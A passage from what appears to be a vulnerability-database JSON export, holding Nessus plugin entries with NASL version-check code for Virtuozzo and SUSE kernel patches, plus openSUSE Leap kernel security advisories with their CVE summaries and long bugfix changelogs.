flaw\n was found in the way the raw packet sockets are\n implemented in the Linux kernel networking subsystem\n handling synchronization. A local user able to open a\n raw packet socket (requires the CAP_NET_RAW capability)\n could use this flaw to elevate their privileges on the\n system.\n\n - Andrey Konovalov discovered a race condition in the UDP\n Fragmentation Offload (UFO) code in the Linux kernel. A\n local attacker could use this to cause a denial of\n service or execute arbitrary code.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Virtuozzo security advisory.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "modified": "2020-07-02T00:00:00", "id": "VIRTUOZZO_VZA-2017-073.NASL", "href": "https://www.tenable.com/plugins/nessus/102593", "published": "2017-08-21T00:00:00", "title": "Virtuozzo 7 : readykernel-patch (VZA-2017-073)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(102593);\n script_version(\"3.9\");\n script_cvs_date(\"Date: 2019/06/10 11:30:32\");\n\n script_cve_id(\n \"CVE-2017-1000111\",\n \"CVE-2017-1000112\"\n );\n\n script_name(english:\"Virtuozzo 7 : readykernel-patch (VZA-2017-073)\");\n script_summary(english:\"Checks the readykernel output for the updated patch.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Virtuozzo host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the vzkernel package and the\nreadykernel-patch installed, the Virtuozzo installation on the remote\nhost is affected by the following vulnerabilities :\n\n - A race condition issue leading to a use-after-free flaw\n was found in the way the raw packet sockets are\n implemented in the Linux kernel networking subsystem\n handling synchronization. A local user able to open a\n raw packet socket (requires the CAP_NET_RAW capability)\n could use this flaw to elevate their privileges on the\n system.\n\n - Andrey Konovalov discovered a race condition in the UDP\n Fragmentation Offload (UFO) code in the Linux kernel. A\n local attacker could use this to cause a denial of\n service or execute arbitrary code.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Virtuozzo security advisory.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://help.virtuozzo.com/customer/portal/articles/2860787\");\n # https://readykernel.com/patch/Virtuozzo-7/readykernel-patch-33.22-29.1-1.vl7/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?2bd516c2\");\n script_set_attribute(attribute:\"solution\", value:\"Update the readykernel patch.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Linux Kernel UDP Fragmentation Offset (UFO) Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/08/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/08/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:readykernel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:virtuozzo:virtuozzo:7\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Virtuozzo Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Virtuozzo/release\", \"Host/Virtuozzo/rpm-list\", \"Host/readykernel-info\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"readykernel.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/Virtuozzo/release\");\nif (isnull(release) || \"Virtuozzo\" >!< release) audit(AUDIT_OS_NOT, \"Virtuozzo\");\nos_ver = pregmatch(pattern: \"Virtuozzo Linux release ([0-9]+\\.[0-9])(\\D|$)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Virtuozzo\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Virtuozzo 7.x\", \"Virtuozzo \" + os_ver);\n\nif (!get_kb_item(\"Host/Virtuozzo/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Virtuozzo\", cpu);\n\nrk_info = get_kb_item(\"Host/readykernel-info\");\nif (empty_or_null(rk_info)) audit(AUDIT_UNKNOWN_APP_VER, \"Virtuozzo\");\n\nchecks = make_list2(\n make_array(\n \"kernel\",\"vzkernel-3.10.0-514.26.1.vz7.33.22\",\n \"patch\",\"readykernel-patch-33.22-29.1-1.vl7\"\n )\n);\nreadykernel_execute_checks(checks:checks, severity:SECURITY_HOLE, release:\"Virtuozzo-7\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-01T04:31:03", "bulletinFamily": "scanner", "description": "This update for the Linux Kernel 3.12.61-52_122 fixes several issues.\nThe following security issue was fixed :\n\n - CVE-2017-15649: net/packet/af_packet.c in the Linux\n kernel allowed local users to gain privileges via\n crafted system calls that trigger mishandling of\n packet_fanout data structures, because of a race\n condition (involving fanout_add and packet_do_bind) that\n leads to a use-after-free, a different vulnerability\n than CVE-2017-6346 (bsc#1064392)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2020-07-02T00:00:00", "id": "SUSE_SU-2018-0664-1.NASL", "href": "https://www.tenable.com/plugins/nessus/108511", "published": "2018-03-21T00:00:00", "title": "SUSE SLES12 Security Update : kernel (SUSE-SU-2018:0664-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:0664-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(108511);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/09/10 13:51:47\");\n\n script_cve_id(\"CVE-2017-15649\", \"CVE-2017-6346\");\n\n script_name(english:\"SUSE SLES12 Security Update : kernel (SUSE-SU-2018:0664-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for the Linux Kernel 3.12.61-52_122 fixes several issues.\nThe following security issue was fixed :\n\n - CVE-2017-15649: net/packet/af_packet.c in the Linux\n kernel allowed local users to gain privileges via\n crafted system calls that trigger mishandling of\n packet_fanout data structures, because of a race\n condition (involving fanout_add and packet_do_bind) that\n leads to a use-after-free, a different vulnerability\n than CVE-2017-6346 (bsc#1064392)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1064392\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-15649/\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20180664-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?87298150\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server 12-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-2018-450=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_61-52_122-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_61-52_122-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/03/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/21\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_61-52_122-default-2-2.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_61-52_122-xen-2-2.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2017-10-30T00:32:06", "bulletinFamily": "unix", "description": "The openSUSE Leap 42.2 kernel was updated to 4.4.92 to receive various\n security and bugfixes.\n\n The following security bugs were fixed:\n\n - CVE-2017-13080: Wi-Fi Protected Access (WPA and WPA2) allowed\n reinstallation of the Group Temporal Key (GTK) during the group key\n handshake, allowing an attacker within radio range to replay frames from\n access points to clients (bnc#1063667).\n - CVE-2017-15265: Race condition in the ALSA subsystem in the Linux kernel\n allowed local users to cause a denial of service (use-after-free) or\n possibly have unspecified other impact via crafted /dev/snd/seq ioctl\n calls, related to sound/core/seq/seq_clientmgr.c and\n sound/core/seq/seq_ports.c (bnc#1062520).\n - CVE-2017-15649: net/packet/af_packet.c in the Linux kernel allowed local\n users to gain privileges via crafted system calls that trigger\n mishandling of packet_fanout data structures, because of a race\n condition (involving fanout_add and packet_do_bind) that leads to a\n use-after-free, a different vulnerability than CVE-2017-6346\n (bnc#1064388).\n\n The following non-security bugs were fixed:\n\n - alsa: au88x0: avoid theoretical uninitialized access (bnc#1012382).\n - alsa: compress: Remove unused variable (bnc#1012382).\n - alsa: usb-audio: Check out-of-bounds access by corrupted buffer\n descriptor (bnc#1012382).\n - alsa: usx2y: Suppress kernel warning at page allocation failures\n (bnc#1012382).\n - arm: 8635/1: nommu: allow enabling REMAP_VECTORS_TO_RAM (bnc#1012382).\n - arm: dts: r8a7790: Use R-Car Gen 2 fallback binding for msiof nodes\n (bnc#1012382).\n - arm: remove duplicate 'const' annotations' (bnc#1012382).\n - asoc: dapm: fix some pointer error handling (bnc#1012382).\n - asoc: dapm: handle probe deferrals (bnc#1012382).\n - audit: log 32-bit socketcalls (bnc#1012382).\n - blacklist 0e7736c6b806 powerpc/powernv: Fix data type for @r in\n pnv_ioda_parse_m64_window()\n - blacklist.conf: not fitting cleanup patch\n - brcmfmac: setup passive scan if requested by user-space (bnc#1012382).\n - bridge: netlink: register netdevice before executing changelink\n (bnc#1012382).\n - ceph: avoid panic in create_session_open_msg() if utsname() returns NULL\n (bsc#1061451).\n - ceph: check negative offsets in ceph_llseek() (bsc#1061451).\n - driver core: platform: Do not read past the end of "driver_override"\n buffer (bnc#1012382).\n - drivers: firmware: psci: drop duplicate const from psci_of_match\n (bnc#1012382).\n - drivers: hv: fcopy: restore correct transfer length (bnc#1012382).\n - drm/amdkfd: fix improper return value on error (bnc#1012382).\n - drm: bridge: add DT bindings for TI ths8135 (bnc#1012382).\n - drm_fourcc: Fix DRM_FORMAT_MOD_LINEAR #define (bnc#1012382).\n - drm/i915/bios: ignore HDMI on port A (bnc#1012382).\n - ext4: do not allow encrypted operations without keys (bnc#1012382).\n - extcon: axp288: Use vbus-valid instead of -present to determine cable\n presence (bnc#1012382).\n - exynos-gsc: Do not swap cb/cr for semi planar formats (bnc#1012382).\n - fix whitespace according to upstream commit\n - fs/epoll: cache leftmost node (bsc#1056427).\n - ftrace: Fix kmemleak in unregister_ftrace_graph (bnc#1012382).\n - gfs2: Fix reference to ERR_PTR in gfs2_glock_iter_next (bnc#1012382).\n - hid: i2c-hid: allocate hid buffers for real worst case (bnc#1012382).\n - hpsa: correct lun data caching bitmap definition (bsc#1028971).\n - hwmon: (gl520sm) Fix overflows and crash seen when writing into limit\n attributes (bnc#1012382).\n - i2c: meson: fix wrong variable usage in meson_i2c_put_data (bnc#1012382).\n - i40e: Initialize 64-bit statistics TX ring seqcount (bsc#969476\n FATE#319648 bsc#969477 FATE#319816).\n - i40iw: Add missing memory barriers (bsc#969476 FATE#319648 bsc#969477\n FATE#319816).\n - i40iw: Fix port number for query QP (bsc#969476 FATE#319648 bsc#969477\n FATE#319816).\n - ib/core: Fix for core panic (bsc#1022595 FATE#322350).\n - ib/core: Fix the validations of a multicast LID in attach or detach\n operations (bsc#1022595 FATE#322350).\n - ib/i40iw: Fix error code in i40iw_create_cq() (bsc#969476 FATE#319648\n bsc#969477 FATE#319816).\n - ib/ipoib: Fix deadlock over vlan_mutex (bnc#1012382).\n - ib/ipoib: Replace list_del of the neigh->list with list_del_init\n (bnc#1012382).\n - ib/ipoib: rtnl_unlock can not come after free_netdev (bnc#1012382).\n - ib/mlx5: Fix Raw Packet QP event handler assignment (bsc#966170\n FATE#320225 bsc#966172 FATE#320226).\n - ibmvnic: Set state UP (bsc#1062962).\n - ib/qib: fix false-postive maybe-uninitialized warning (bnc#1012382).\n - igb: re-assign hw address pointer on reset after PCI error (bnc#1012382).\n - iio: ad7793: Fix the serial interface reset (bnc#1012382).\n - iio: adc: axp288: Drop bogus AXP288_ADC_TS_PIN_CTRL register\n modifications (bnc#1012382).\n - iio: adc: hx711: Add DT binding for avia,hx711 (bnc#1012382).\n - iio: adc: mcp320x: Fix oops on module unload (bnc#1012382).\n - iio: adc: mcp320x: Fix readout of negative voltages (bnc#1012382).\n - iio: adc: twl4030: Disable the vusb3v1 rugulator in the error handling\n path of 'twl4030_madc_probe()' (bnc#1012382).\n - iio: adc: twl4030: Fix an error handling path in 'twl4030_madc_probe()'\n (bnc#1012382).\n - iio: ad_sigma_delta: Implement a dedicated reset function (bnc#1012382).\n - iio: core: Return error for failed read_reg (bnc#1012382).\n - iommu/io-pgtable-arm: Check for leaf entry before dereferencing it\n (bnc#1012382).\n - iwlwifi: add workaround to disable wide channels in 5GHz (bnc#1012382).\n - ixgbe: Fix incorrect bitwise operations of PTP Rx timestamp flags\n (bsc#969474 FATE#319812 bsc#969475 FATE#319814).\n - kABI: protect struct rm_data_op (kabi).\n - kABI: protect struct sdio_func (kabi).\n - libata: transport: Remove circular dependency at free time (bnc#1012382).\n - lsm: fix smack_inode_removexattr and xattr_getsecurity memleak\n (bnc#1012382).\n - md/raid10: submit bio directly to replacement disk (bnc#1012382).\n - mips: Ensure bss section ends on a long-aligned address (bnc#1012382).\n - mips: Fix minimum alignment requirement of IRQ stack (git-fixes).\n - mips: IRQ Stack: Unwind IRQ stack onto task stack (bnc#1012382).\n - mips: Lantiq: Fix another request_mem_region() return code check\n (bnc#1012382).\n - mips: ralink: Fix incorrect assignment on ralink_soc (bnc#1012382).\n - mlx5: Avoid that mlx5_ib_sg_to_klms() overflows the klms array\n (bsc#966170 FATE#320225 bsc#966172 FATE#320226).\n - mm/backing-dev.c: fix an error handling path in 'cgwb_create()'\n (bnc#1063475).\n - mm,compaction: serialize waitqueue_active() checks (for real)\n (bsc#971975).\n - mmc: sdio: fix alignment issue in struct sdio_func (bnc#1012382).\n - mm: discard memblock data later (bnc#1063460).\n - mm/memblock.c: reversed logic in memblock_discard() (bnc#1063460).\n - mm: meminit: mark init_reserved_page as __meminit (bnc#1063509).\n - mm/memory_hotplug: change pfn_to_section_nr/section_nr_to_pfn macro to\n inline function (bnc#1063501).\n - mm/memory_hotplug: define find_{smallest|biggest}_section_pfn as\n unsigned long (bnc#1063520).\n - net: core: Prevent from dereferencing null pointer when releasing SKB\n (bnc#1012382).\n - netfilter: invoke synchronize_rcu after set the _hook_ to NULL\n (bnc#1012382).\n - netfilter: nfnl_cthelper: fix incorrect helper->expect_class_max\n (bnc#1012382).\n - net/mlx4_core: Enable 4K UAR if SRIOV module parameter is not enabled\n (bsc#966191 FATE#320230 bsc#966186 FATE#320228).\n - net/mlx5e: Fix wrong delay calculation for overflow check scheduling\n (bsc#966170 FATE#320225 bsc#966172 FATE#320226).\n - net/mlx5e: Schedule overflow check work to mlx5e workqueue (bsc#966170\n FATE#320225 bsc#966172 FATE#320226).\n - net/mlx5: Skip mlx5_unload_one if mlx5_load_one fails (bsc#966170\n FATE#320225 bsc#966172 FATE#320226).\n - net/packet: check length in getsockopt() called with PACKET_HDRLEN\n (bnc#1012382).\n - nvme: protect against simultaneous shutdown invocations (FATE#319965\n bnc#1012382 bsc#964944).\n - parisc: perf: Fix potential NULL pointer dereference (bnc#1012382).\n - partitions/efi: Fix integer overflow in GPT size calculation\n (bnc#1012382).\n - qed: Fix stack corruption on probe (bsc#966318 FATE#320158 bsc#966316\n FATE#320159).\n - rds: ib: add error handle (bnc#1012382).\n - rds: RDMA: Fix the composite message user notification (bnc#1012382).\n - README.BRANCH: Add Michal and Johannes as co-maintainers.\n - sched/cpuset/pm: Fix cpuset vs. suspend-resume bugs (bnc#1012382).\n - scsi: hpsa: add 'ctlr_num' sysfs attribute (bsc#1028971).\n - scsi: hpsa: bump driver version (bsc#1022600 fate#321928).\n - scsi: hpsa: change driver version (bsc#1022600 bsc#1028971 fate#321928).\n - scsi: hpsa: Check for null device pointers (bsc#1028971).\n - scsi: hpsa: Check for null devices in ioaccel (bsc#1028971).\n - scsi: hpsa: Check for vpd support before sending (bsc#1028971).\n - scsi: hpsa: cleanup reset handler (bsc#1022600 fate#321928).\n - scsi: hpsa: correct call to hpsa_do_reset (bsc#1028971).\n - scsi: hpsa: correct logical resets (bsc#1028971).\n - scsi: hpsa: correct queue depth for externals (bsc#1022600 fate#321928).\n - scsi: hpsa: correct resets on retried commands (bsc#1022600 fate#321928).\n - scsi: hpsa: correct scsi 6byte lba calculation (bsc#1028971).\n - scsi: hpsa: Determine device external status earlier (bsc#1028971).\n - scsi: hpsa: do not get enclosure info for external devices (bsc#1022600\n fate#321928).\n - scsi: hpsa: do not reset enclosures (bsc#1022600 fate#321928).\n - scsi: hpsa: do not timeout reset operations (bsc#1022600 bsc#1028971\n fate#321928).\n - scsi: hpsa: fallback to use legacy REPORT PHYS command (bsc#1028971).\n - scsi: hpsa: fix volume offline state (bsc#1022600 bsc#1028971\n fate#321928).\n - scsi: hpsa: limit outstanding rescans (bsc#1022600 bsc#1028971\n fate#321928).\n - scsi: hpsa: Prevent sending bmic commands to externals (bsc#1028971).\n - scsi: hpsa: remove abort handler (bsc#1022600 fate#321928).\n - scsi: hpsa: remove coalescing settings for ioaccel2 (bsc#1028971).\n - scsi: hpsa: remove memory allocate failure message (bsc#1028971).\n - scsi: hpsa: Remove unneeded void pointer cast (bsc#1028971).\n - scsi: hpsa: rescan later if reset in progress (bsc#1022600 fate#321928).\n - scsi: hpsa: send ioaccel requests with 0 length down raid path\n (bsc#1022600 fate#321928).\n - scsi: hpsa: separate monitor events from rescan worker (bsc#1022600\n fate#321928).\n - scsi: hpsa: update check for logical volume status (bsc#1022600\n bsc#1028971 fate#321928).\n - scsi: hpsa: update identify physical device structure (bsc#1022600\n fate#321928).\n - scsi: hpsa: update pci ids (bsc#1022600 bsc#1028971 fate#321928).\n - scsi: hpsa: update reset handler (bsc#1022600 fate#321928).\n - scsi: hpsa: use designated initializers (bsc#1028971).\n - scsi: hpsa: use %phN for short hex dumps (bsc#1028971).\n - scsi: libfc: fix a deadlock in fc_rport_work (bsc#1063695).\n - scsi: sd: Do not override max_sectors_kb sysfs setting (bsc#1025461).\n - scsi: sd: Remove LBPRZ dependency for discards (bsc#1060985). This patch\n is originally part of a larger series which can't be easily backported\n to SLE-12. For a reasoning why we think it's safe to apply, see\n bsc#1060985, comment 20.\n - scsi: sg: close race condition in sg_remove_sfp_usercontext()\n (bsc#1064206).\n - sh_eth: use correct name for ECMR_MPDE bit (bnc#1012382).\n - staging: iio: ad7192: Fix - use the dedicated reset function avoiding\n dma from stack (bnc#1012382).\n - stm class: Fix a use-after-free (bnc#1012382).\n - supported.conf: mark hid-multitouch as supported (FATE#323670)\n - team: call netdev_change_features out of team lock (bsc#1055567).\n - team: fix memory leaks (bnc#1012382).\n - tpm_tis: Do not fall back to a hardcoded address for TPM2 (bsc#1020645,\n fate#321435, fate#321507, fate#321600, bsc#1034048).\n - ttpci: address stringop overflow warning (bnc#1012382).\n - tty: goldfish: Fix a parameter of a call to free_irq (bnc#1012382).\n - usb: chipidea: vbus event may exist before starting gadget (bnc#1012382).\n - usb: core: harden cdc_parse_cdc_header (bnc#1012382).\n - usb: devio: Do not corrupt user memory (bnc#1012382).\n - usb: dummy-hcd: fix connection failures (wrong speed) (bnc#1012382).\n - usb: dummy-hcd: Fix erroneous synchronization change (bnc#1012382).\n - usb: dummy-hcd: fix infinite-loop resubmission bug (bnc#1012382).\n - usb: fix out-of-bounds in usb_set_configuration (bnc#1012382).\n - usb: gadgetfs: fix copy_to_user while holding spinlock (bnc#1012382).\n - usb: gadgetfs: Fix crash caused by inadequate synchronization\n (bnc#1012382).\n - usb: gadget: inode.c: fix unbalanced spin_lock in ep0_write\n (bnc#1012382).\n - usb: gadget: mass_storage: set msg_registered after msg registered\n (bnc#1012382).\n - usb: gadget: udc: atmel: set vbus irqflags explicitly (bnc#1012382).\n - usb: g_mass_storage: Fix deadlock when driver is unbound (bnc#1012382).\n - usb: Increase quirk delay for USB devices (bnc#1012382).\n - usb: pci-quirks.c: Corrected timeout values used in handshake\n (bnc#1012382).\n - usb: plusb: Add support for PL-27A1 (bnc#1012382).\n - usb: renesas_usbhs: fix the BCLR setting condition for non-DCP pipe\n (bnc#1012382).\n - usb: renesas_usbhs: fix usbhsf_fifo_clear() for RX direction\n (bnc#1012382).\n - usb: serial: mos7720: fix control-message error handling (bnc#1012382).\n - usb: serial: mos7840: fix control-message error handling (bnc#1012382).\n - usb-storage: unusual_devs entry to fix write-access regression for\n Seagate external drives (bnc#1012382).\n - usb: uas: fix bug in handling of alternate settings (bnc#1012382).\n - uwb: ensure that endpoint is interrupt (bnc#1012382).\n - uwb: properly check kthread_run return value (bnc#1012382).\n - xfs: handle error if xfs_btree_get_bufs fails (bsc#1059863).\n - xfs: remove kmem_zalloc_greedy (bnc#1012382).\n - xhci: fix finding correct bus_state structure for USB 3.1 hosts\n (bnc#1012382).\n\n", "modified": "2017-10-29T21:08:14", "published": "2017-10-29T21:08:14", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-10/msg00085.html", "id": "OPENSUSE-SU-2017:2905-1", "title": "Security update for the Linux Kernel (important)", "type": "suse", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-10-25T16:31:52", "bulletinFamily": "unix", "description": "The openSUSE Leap 42.3 kernel was updated to 4.4.92 to receive various\n security and bugfixes.\n\n\n The following security bugs were fixed:\n\n - CVE-2017-13080: Wi-Fi Protected Access (WPA and WPA2) allowed\n reinstallation of the Group Temporal Key (GTK) during the group key\n handshake, allowing an attacker within radio range to replay frames from\n access points to clients (bnc#1063667).\n - CVE-2017-15265: Race condition in the ALSA subsystem in the Linux kernel\n allowed local users to cause a denial of service (use-after-free) or\n possibly have unspecified other impact via crafted /dev/snd/seq ioctl\n calls, related to sound/core/seq/seq_clientmgr.c and\n sound/core/seq/seq_ports.c (bnc#1062520).\n - CVE-2017-15649: net/packet/af_packet.c in the Linux kernel allowed local\n users to gain privileges via crafted system calls that trigger\n mishandling of packet_fanout data structures, because of a race\n condition (involving fanout_add and packet_do_bind) that leads to a\n use-after-free, a different vulnerability than CVE-2017-6346\n (bnc#1064388).\n\n The following non-security bugs were fixed:\n\n - acpi/processor: Check for duplicate processor ids at hotplug time\n (bnc#1056230).\n - acpi/processor: Implement DEVICE operator for processor enumeration\n (bnc#1056230).\n - add mainline tags to hyperv patches\n - alsa: au88x0: avoid theoretical uninitialized access (bnc#1012382).\n - alsa: compress: Remove unused variable (bnc#1012382).\n - alsa: usb-audio: Check out-of-bounds access by corrupted buffer\n descriptor (bnc#1012382).\n - alsa: usx2y: Suppress kernel warning at page allocation failures\n (bnc#1012382).\n - arm64: add function to get a cpu's MADT GICC table (bsc#1062279).\n - arm64: dts: Add Broadcom Vulcan PMU in dts (fate#319481).\n - arm64/perf: Access pmu register using <read/write;gt;_sys_reg\n (bsc#1062279).\n - arm64/perf: Add Broadcom Vulcan PMU support (fate#319481).\n - arm64/perf: Changed events naming as per the ARM ARM (fate#319481).\n - arm64/perf: Define complete ARMv8 recommended implementation defined\n events (fate#319481).\n - arm64: perf: do not expose CHAIN event in sysfs (bsc#1062279).\n - arm64: perf: Extend event config for ARMv8.1 (bsc#1062279).\n - arm64/perf: Filter common events based on PMCEIDn_EL0 (fate#319481).\n - arm64: perf: Ignore exclude_hv when kernel is running in HYP\n (bsc#1062279).\n - arm64: perf: move to common attr_group fields (bsc#1062279).\n - arm64: perf: Use the builtin_platform_driver (bsc#1062279).\n - arm64: pmu: add fallback probe table (bsc#1062279).\n - arm64: pmu: Hoist pmu platform device name (bsc#1062279).\n - arm64: pmu: Probe default hw/cache counters (bsc#1062279).\n - arm64: pmuv3: handle pmuv3+ (bsc#1062279).\n - arm64: pmuv3: handle !PMUv3 when probing (bsc#1062279).\n - arm64: pmuv3: use arm_pmu ACPI framework (bsc#1062279).\n - arm64: pmu: Wire-up Cortex A53 L2 cache events and DTLB refills\n (bsc#1062279).\n - arm: 8635/1: nommu: allow enabling REMAP_VECTORS_TO_RAM (bnc#1012382).\n - arm: dts: r8a7790: Use R-Car Gen 2 fallback binding for msiof nodes\n (bnc#1012382).\n - arm/perf: Convert to hotplug state machine (bsc#1062279).\n - arm/perf: Fix hotplug state machine conversion (bsc#1062279).\n - arm/perf: Use multi instance instead of custom list 